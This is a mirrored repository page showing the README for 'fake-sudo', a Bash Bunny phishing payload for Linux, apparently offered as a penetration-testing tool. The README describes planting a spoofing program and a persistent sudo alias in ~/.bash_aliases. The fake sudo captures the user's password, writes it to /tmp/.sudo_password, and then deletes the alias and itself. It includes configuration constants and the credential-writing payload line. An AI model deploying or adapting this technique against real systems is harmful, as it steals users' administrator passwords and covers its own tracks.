hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity
bashbunny-payloads/payloads/library/phishing/fake-sudo
History
TW-D 80573a03ab
fake-sudo - Improvements and corrections (#528) 
* Update README.md

* Update sudo-phishing.sh

* Update sudo-phishing.sh

* Delete payloads/library/phishing/fake-sudo directory

* Add files via upload
2022-05-29 16:21:12 -05:00
..
payload.txt
fake-sudo - Improvements and corrections (#528)
2022-05-29 16:21:12 -05:00
README.md
fake-sudo - Improvements and corrections (#528)
2022-05-29 16:21:12 -05:00
sudo-phishing.sh
fake-sudo - Improvements and corrections (#528)
2022-05-29 16:21:12 -05:00

README.md

Fake sudo

  • Title: Fake sudo
  • Author: TW-D
  • Version: 1.1
  • Target: Linux
  • Category: Phishing

Description

  1. Copies the "sudo" command spoofing program to the user's home directory.
  2. Defines a new persistent "sudo" alias with the file "~/.bash_aliases".
  3. When the user "sudoer" executes the command "sudo" in a terminal, the spoofing program :
  • By default retrieves the username and password and writes them to "/tmp/.sudo_password".
  • But this behavior can be changed in line 26 of the "sudo-phishing.sh" file.
  1. The spoofing program deletes the "sudo" alias. Then it deletes itself.

Configuration

From "payload.txt" change the values of the following constant :


######## INITIALIZATION ########

readonly BB_LABEL="BashBunny"

From "sudo-phishing.sh" change the values of the following constants if necessary :


readonly MAXIMUM_ATTEMPTS=3
readonly ERROR_MESSAGE="sudo: ${MAXIMUM_ATTEMPTS} incorrect password attempts"

From "sudo-phishing.sh", change the payload if you wish :

##
# <YOUR-PAYLOAD>
##
/bin/echo "${USER}:${sudo_password}" > /tmp/.sudo_password
##
# </YOUR-PAYLOAD>
##